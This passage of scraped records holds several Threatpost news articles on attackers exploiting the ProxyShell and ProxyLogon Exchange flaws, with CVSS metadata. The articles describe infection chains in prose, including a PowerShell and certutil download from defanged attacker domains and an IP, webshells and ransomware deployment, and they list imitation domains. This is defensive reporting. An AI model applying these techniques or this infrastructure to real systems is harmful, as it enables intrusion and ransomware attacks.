vulnerabilities in [May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>). Those who\u2019ve applied the [May or July](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) updates are protected from all of these. Microsoft has [reiterated](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) that those who\u2019ve applied the ProxyLogon patch released in [March](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) aren\u2019t protected from ProxyShell vulnerabilities and should install the more recent security updates.\n\n## How to Fend Off ProxyLogon/ProxyShell Attacks\n\nExploiting ProxyLogon and ProxyShell enabled the attackers to slip past checks for malicious email, which \u201chighlights how users [play] an important part in the success or failure of an attack,\u201d Trend Micro observed. These campaigns \u201cshould make users wary of the different tactics used to mask malicious emails and files,\u201d the researchers wrote.\n\nIn other words, just because email comes from a trusted contact is no guarantee that any attachment or link it contains can be trusted, they said.\n\nOf course, patching is the number one way to stay safe, but Trend Micro gave these additional tips if that\u2019s not possible:\n\n * Enable virtual patching modules on all Exchange servers to provide critical level protection for servers that have not yet been patched for these vulnerabilities.\n * Use endpoint detection and response (EDR) solutions in critical servers, as it provides visibility to machine internals and detects any suspicious behavior running on servers.\n * Use endpoint protection design for servers.\n * Apply sandbox technology on email, network and web to detect similar URLs and samples.\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-22T19:26:25", "type": "threatpost", "title": "Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-22T19:26:25", "id": "THREATPOST:836083DB3E61D979644AE68257229776", "href": "https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-26T23:21:31", "description": "Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on several ProxyShell vulnerabilities in that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.\n\nThe company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers \u201cto deploy ransomware or conduct other post-exploitation activities\u201d and urging them to update immediately.\n\n\u201cOur recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,\u201d the company said. \u201cPlease update now!\u201d \n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)Customers that have installed the [May 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>) or the [July 2021 security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-july-2021-exchange-server-security-updates/ba-p/2523421>) on their Exchange servers are protected from these vulnerabilities, as are Exchange Online customers so long as they ensure that all hybrid Exchange servers are updated, the company wrote.\n\n\u201cBut if you have not installed either of these security updates, then your servers and data are vulnerable,\u201d according to the advisory.\n\nThe ProxyShell bugs that Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) outlined in a presentation at Black Hat. The three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) enable an adversary to trigger remote code execution on Microsoft Exchange servers. Microsoft said the bugs can be exploited in the following cases:\n\n\u2013The server is running an older, unsupported CU;\n\n\u2013The server is running security updates for older, unsupported versions of Exchange that were [released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) in March 2021; or\n\n\u2013The server is running an older, unsupported CU, with the [March 2021 EOMT](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) mitigations applied.\n\n\u201cIn all of the above scenarios, you _must_ install one of latest supported CUs and all applicable SUs to be protected,\u201d according to Microsoft. \u201cAny Exchange servers that are not on a supported CU _and_ the latest available SU are vulnerable to ProxyShell and other attacks that leverage older vulnerabilities.\u201d\n\n**Sounding the Alarm**\n\nFollowing Tsai\u2019s presentation on the bugs, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that [he found more](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find exploiting then easy to execute, given how much information is available.\n\nSecurity researchers at Huntress also reported seeing [ProxyShell vulnerabilities](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) being actively exploited throughout the month of August to install backdoor access once the [ProxyShell exploit code](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) was published on Aug. 6. But starting last Friday, Huntress reported a \u201csurge\u201d in attacks after finding 140 webshells launched against 1,900 unpatched Exchange servers.\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) joined those sounding the alarm over the weekend, issuing [an urgent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>). They, too, urged organizations to immediately install the latest Microsoft Security Update.\n\nAt the time, researcher Kevin Beaumont expressed [criticism over Microsoft\u2019s messaging efforts](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) surrounding the vulnerability and the urgent need for its customers to update their Exchange Server security.\n\n\u201cMicrosoft decided to downplay the importance of the patches and treat them as a standard monthly Exchange patch, which [has] been going on for \u2013 obviously \u2013 decades,\u201d Beaumont explained.\n\nBut Beaumont said these remote code execution (RCE) vulnerabilities are \u201c\u2026as serious as they come.\u201d He noted that the company did not help matters by failing to allocate CVEs for them until July \u2014 four months after the patches were issued.\n\nIn order of patching priority, according to Beaumont, the vulnerabilities are: [CVE-2021\u201334473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021\u201334523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) and [CVE-2021\u201331207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>).\n\nCVE-2021-34473, a vulnerability in which a pre-auth path confusion leads to ACL Bypass, was patched in April. CVE-2021-34523, also patched in April, is an elevation of privilege on Exchange PowerShell backend. CVE-2021-31207, a bug in which a post-auth Arbitrary-File-Write leads to remote code execution, was patched in May.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-26T12:39:54", "type": "threatpost", "title": "Microsoft Breaks Silence on Barrage of ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-26T12:39:54", "id": "THREATPOST:83C349A256695022C2417F465CEB3BB2", "href": "https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-01T12:44:45", "description": "A new APT group has emerged that\u2019s specifically targeting the fuel and energy complex and aviation industry in Russia, exploiting known vulnerabilities like Microsoft Exchange Server\u2019s [ProxyShell](<https://threatpost.com/microsoft-barrage-proxyshell-attacks/168943/>) and leveraging both new and existing malware to compromise networks.\n\nResearchers at security firm [Positive Technologies](<https://www.ptsecurity.com/ww-en/>) have been tracking the group, dubbed ChamelGang for its chameleon-like capabilities, since March. Though attackers mainly have been seen targeting Russian organizations, they have attacked targets in 10 countries so far, researchers said in a [report](<https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/>) by company researchers Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov and Stanislav Rakovsky published online Thursday.\n\nTo avoid detection, ChamelGang hides its malware and network infrastructure under legitimate services of established companies like Microsoft, TrendMicro, McAfee, IBM and Google in a couple of unique ways, researchers observed.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOne is to acquire domains that imitate their legitimate counterparts \u2013 such as newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com and mcafee-upgrade.com. The other is to place SSL certificates that also imitate legitimate ones \u2013 such as github.com, www.ibm.com, jquery.com, update.microsoft-support.net \u2013 on its servers, researchers said.\n\nMoreover, ChamelGang \u2013 like [Nobelium](<https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/>) and [REvil](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) before it \u2013 has hopped on the bandwagon of attacking the supply chain first to gain access to its ultimate target, they said. In one of the cases analyzed by Positive Technologies, \u201cthe group compromised a subsidiary and penetrated the target company\u2019s network through it,\u201d according to the writeup.\n\nThe attackers also appear malware-agnostic when it comes to tactics, using both known malicious programs such as [FRP](<https://howtofix.guide/frp-exe-virus/>), [Cobalt Strike Beacon](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), and Tiny Shell, as well as previously unknown malware ProxyT, BeaconLoader and the DoorMe backdoor, researchers said.\n\n## **Two Separate Attacks**\n\nResearchers analyzed two attacks by the novel APT: one in March and one in August. The first investigation was triggered after a Russia-based energy company\u2019s antivirus protection repeatedly reported the presence of the Cobalt Strike Beacon in RAM.\n\nAttackers gained access to the energy company\u2019s network through the supply chain, compromising a vulnerable version of a subsidiary company\u2019s web application on the JBoss Application Server. Upon investigation, researchers found that attackers exploited a critical vulnerability, [CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>), to remotely execute commands on the host.\n\nOnce on the energy company\u2019s network, ChamelGang moved laterally, deploying a number of tools along the way. They included Tiny Shell, with which a UNIX backdoor can receive a shell from an infected host, execute a command and transfer files; an old DLL hijacking technique associated with the Microsoft Distributed Transaction Control (MSDTC) Windows service to gain persistence and escalate privileges; and the Cobalt Strike Beacon for calling back to attackers for additional commands.\n\nResearchers were successful in accessing and exfiltrating data in the attack, researchers said. \u201cAfter collecting the data, they placed it on web servers on the compromised network for further downloading \u2026 using the Wget utility,\u201d they wrote.\n\n## **Cutting Short a ProxyShell Attack **\n\nThe second attack was on an organization from the Russian aviation production sector, researchers said. They notified the company four days after the server was compromised, working with employees to eliminate the threat shortly after.\n\n\u201cIn total, the attackers remained in the victim\u2019s network for eight days,\u201d researchers wrote. \u201cAccording to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.\u201d\n\nIn this instance, ChamelGang used a known chain of vulnerabilities in Microsoft Exchange called ProxyShell \u2013 CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 \u2013 to compromise network nodes and gain a foothold. Indeed, a number of attackers took advantage of ProxyShell throughout August, [pummeling](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) unpatched Exchange servers with attacks after a [researcher at BlackHat revealed](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) the attack surface.\n\nOnce on the network, attackers then installed a modified version of the backdoor DoorMe v2 on two Microsoft Exchange mail servers on the victim\u2019s network. Attackers also used BeaconLoader to move inside the network and infect nodes, as well as the Cobalt Strike Beacon.\n\n## **Victims Across the Globe**\n\nFurther threat intelligence following the investigation into attacks on the Russian companies revealed that ChamelGang\u2019s activity has not been limited to that country.\n\nPositive Technologies eventually identified 13 more compromised organizations in nine other countries \u2013 the U.S., Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In the last four countries mentioned, attackers targeted government servers, they added.\n\nAttackers often used ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server against victims, who were all notified by the appropriate national security authorities in their respective countries.\n\nChamelGang\u2019s tendency to reach its targets through the supply chain also is likely one that it \u2013 as well as other APTs \u2013 will continue, given the success attackers have had so far with this tactic, researchers added. \u201cNew APT groups using this method to achieve their goals will appear on stage,\u201d they said.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-01T12:36:25", "type": "threatpost", "title": "New APT ChamelGang Targets Russian Energy, Aviation Orgs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-01T12:36:25", "id": "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "href": "https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T16:00:33", "description": "A new-ish threat actor sometimes known as \u201cTortilla\u201d is launching a fresh round of ProxyShell attacks on Microsoft Exchange servers, this time with the aim of inflicting vulnerable servers with variants of the Babuk ransomware.\n\nCisco Talos researchers said in a Wednesday [report](<https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) that they spotted the malicious campaign a few weeks ago, on Oct. 12.\n\nTortilla, an actor that\u2019s been operating since July, is predominantly targeting U.S. victims. It\u2019s also hurling a smaller number of infections that have hit machines in the Brazil, Finland, Germany, Honduras, Thailand, Ukraine and the U.K., as shown on the map below.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03120718/ProxShell-Babuk-map-e1635955653968.jpeg>)\n\nVictim distribution map. Source: Cisco Talos.\n\nPrior to this ransomware-inflicting campaign, Tortilla has been experimenting with other payloads, such as the PowerShell-based netcat clone PowerCat.\n\nPowerCat has a penchant for Windows, the researchers explained, being \u201cknown to provide attackers with unauthorized access to Windows machines.\u201d\n\n## ProxyShell\u2019s New Attack Surface\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>)..\n\nIn this latest ProxyShell campaign, Cisco Talos researchers said that the threat actor is using \u201ca somewhat unusual infection chain technique where an intermediate unpacking module is hosted on a pastebin.com clone pastebin.pl\u201d to deliver Babuk.\n\nThey continued: \u201cThe intermediate unpacking stage is downloaded and decoded in memory before the final payload embedded within the original sample is decrypted and executed.\u201d\n\n## Who\u2019s Babuk?\n\nBabuk is a ransomware that\u2019s probably best known for its starring role in a breach of the Washington D.C. police force [in April](<https://threatpost.com/babuk-ransomware-washington-dc-police/165616/>). The gang behind the malware has a short history, having only been [identified in 2021](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>), but that history shows that it\u2019s a [double-extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) player: one that threatens to post stolen data in addition to encrypting files, as a way of applying thumbscrews so victims will pay up.\n\nThat tactic has worked. As [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/babuk-ransomware/>) described in February, Babuk the ransomware had already been lobbed at a batch of at least five big enterprises, with one score: The gang walked away with $85,000 after one of those targets ponied up the money, McAfee researchers said.\n\nIts victims have included Serco, an outsourcing firm that confirmed that it had been [slammed](<https://www.computerweekly.com/news/252495684/Serco-confirms-Babuk-ransomware-attack>) with a double-extortion ransomware attack in late January.\n\nLike many ransomware strains, Babuk is ruthless: It not only encrypts a victim\u2019s machine, it also [blows up backups](<https://threatpost.com/conti-ransomware-backups/175114/>) and deletes the volume shadow copies, Cisco Talos said.\n\n## What\u2019s Under Babuk\u2019s Hood\n\nOn the technical side, Cisco Talos described Babuk as a flexible ransomware that can be compiled, through a ransomware builder, for several hardware and software platforms.\n\nIt\u2019s mostly compiled for Windows and ARM for Linux, but researchers said that, over time, they\u2019ve also seen versions for ESX and a 32-bit, old PE executable.\n\nIn this recent October campaign though, the threat actors are specifically targeting Windows.\n\n## China Chopper Chops Again\n\nPart of the infection chain involves China Chopper: A webshell that dates back to 2010 but which has [clung to relevancy since](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), including reportedly being used in a massive 2019 attack against telecommunications providers called [Operation Soft Cell](<https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers>). The webshell enables attackers to \u201cretain access to an infected system using a client-side application which contains all the logic required to control the target,\u201d as Cisco Talos [described](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>) the webshell in 2019.\n\nThis time around, it\u2019s being used to get to Exchange Server systems. \u201cWe assess with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell,\u201d according to the Cisco Talos writeup.\n\n## The Infection Chain\n\nAs shown in the infection flow chart below, the actors are using either a DLL or .NET executable to kick things off on the targeted system. \u201cThe initial .NET executable module runs as a child process of w3wp.exe and invokes the command shell to run an obfuscated PowerShell command,\u201d according to Cisco Talos\u2019 report.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/03130541/infection-flow-chart-e1635959155173.jpeg>)\n\nInfection flow chart. Source: Cisco Talos.\n\n\u201cThe PowerShell command invokes a web request and downloads the payload loader module using certutil.exe from a URL hosted on the domains fbi[.]fund and xxxs[.]info, or the IP address 185[.]219[.]52[.]229,\u201d researchers said.\n\n\u201cThe payload loader downloads an intermediate unpacking stage from the PasteBin clone site pastebin.pl,\u201d they continued \u2013 a site that \u201cseems to be unrelated to the popular pastebin.com.\u201d\n\nThey continued: \u201cThe unpacker concatenates the bitmap images embedded in the resource section of the trojan and decrypts the payload into the memory. The payload is injected into the process AddInProcess32 and is used to encrypt files on the victim\u2019s server and all mounted drives.\u201d\n\n## More Ingredients in Tortilla\u2019s Infrastructure\n\nBesides the pastebin.pl site that hosts Tortilla\u2019s intermediate unpacker code, Tortilla\u2019s infrastructure also includes a Unix-based download server.\n\nThe site is legitimate, but Cisco Talos has seen multiple malicious campaigns running on it, including hosting variants of the [AgentTesla trojan](<https://threatpost.com/agent-tesla-microsoft-asmi/163581/>) and the [FormBook malware dropper.](<https://threatpost.com/new-formbook-dropper-harbors-persistence/145614/>)\n\n## Babuk\u2019s Code Spill Helps Newbies\n\nIn July, Babuk gang\u2019s source code and builder were spilled: They were [uploaded to VirusTotal](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>), making it available to all security vendors and competitors. That leak has helped the ransomware spread to even an inexperienced, green group like Tortilla, Cisco Talos said.\n\nThe leak \u201cmay have encouraged new malicious actors to manipulate and deploy the malware,\u201d researchers noted.\n\n\u201cThis actor has only been operating since early July this year and has been experimenting with different payloads, apparently in order to obtain and maintain remote access to the infected systems,\u201d according to its writeup.\n\nWith Babuk source code readily available, all the Tortilla actors have to know is how to tweak it a tad, researchers said: A scenario that observers predicted back when the code appeared.\n\n\u201cThe actor displays low to medium skills with a decent understanding of the security concepts and the ability to create minor modifications to existing malware and offensive security tools,\u201d Cisco Talos researchers said in assessing the Tortilla gang.\n\n## Decryptor Won\u2019t Work on Variant\n\nWhile a free [Babuk decryptor was released](<https://www.bleepingcomputer.com/news/security/babuk-ransomware-decryptor-released-to-recover-files-for-free/>) last week, it won\u2019t work on the Babuk variant seen in this campaign, according to the writeup: \u201cUnfortunately, it is only effective on files encrypted with a number of leaked keys and cannot be used to decrypt files encrypted by the variant described in this blog post.\u201d\n\n## How to Keep Exchange Safe\n\nTortilla is hosting malicious modules and conducting internet-wide scanning to exploit vulnerable hosts.\n\nThe researchers recommended staying vigilant, staying on top of any infection in its early stages and implementing a layered defense security, \u201cwith the behavioral protection enabled for endpoints and servers to detect the threats at an early stage of the infection chain.\u201d\n\nThey also recommended keeping servers and apps updated so as to squash vulnerabilities, such as the trio of CVEs exploited in the ProxyShell attacks.\n\nAlso, keep an eye out for backup demolition, as the code deletes shadow copies: \u201cBabuk ransomware is nefarious by its nature and while it encrypts the victim\u2019s machine, it interrupts the system backup process and deletes the volume shadow copies,\u201d according to Cisco Talos.\n\nOn top of all that, bolster detection: Watch out for system configuration changes, suspicious events generated by detection systems for an abrupt service termination, or abnormally high I/O rates for drives attached to servers, according to Cisco Talos.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-03T18:16:37", "type": "threatpost", "title": "\u2018Tortilla\u2019 Wraps Exchange Servers in ProxyShell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-43267"], "modified": "2021-11-03T18:16:37", "id": "THREATPOST:52923238811C7BFD39E0529C85317249", "href": "https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:26:48", "description": "Researchers\u2019 Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.\n\nIn his Black Hat [presentation](<https://www.blackhat.com/us-21/briefings/schedule/#proxylogon-is-just-the-tip-of-the-iceberg-a-new-attack-surface-on-m>) last week, Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. On Monday, the SANS Internet Storm Center\u2019s Jan Kopriva [reported](<https://isc.sans.edu/forums/diary/ProxyShell+how+many+Exchange+servers+are+affected+and+where+are+they/27732/>) that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.\n\nGoing by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, \u201cjust under 50 percent of internet-facing Exchange servers\u201d are currently vulnerable to exploitation, according to a Shodan search.\n\n> Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it's just under 50% of internet facing Exchange servers. [pic.twitter.com/3samyNHBpB](<https://t.co/3samyNHBpB>)\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 13, 2021](<https://twitter.com/GossiTheDog/status/1426207905779527682?ref_src=twsrc%5Etfw>)\n\nOn the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, \u201cchances are that most organizations that take security at least somewhat seriously have already applied the patches,\u201d Kopriva wrote.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe vulnerabilities affect Exchange Server 2013, 2016 and 2019.\n\nOn Thursday, Beaumont and NCC Group\u2019s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.\n\n\u201cStarted to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\u201d Warren tweeted, along with a screen capture of the code for a c# aspx webshell dropped in the /aspnet_client/ directory.\n\n> Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities. This one dropped a c# aspx webshell in the /aspnet_client/ directory: [pic.twitter.com/XbZfmQQNhY](<https://t.co/XbZfmQQNhY>)\n> \n> \u2014 Rich Warren (@buffaloverflow) [August 12, 2021](<https://twitter.com/buffaloverflow/status/1425831100157349890?ref_src=twsrc%5Etfw>)\n\nBeaumont [tweeted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) that he was seeing the same and connected it to Tsai\u2019s talk: 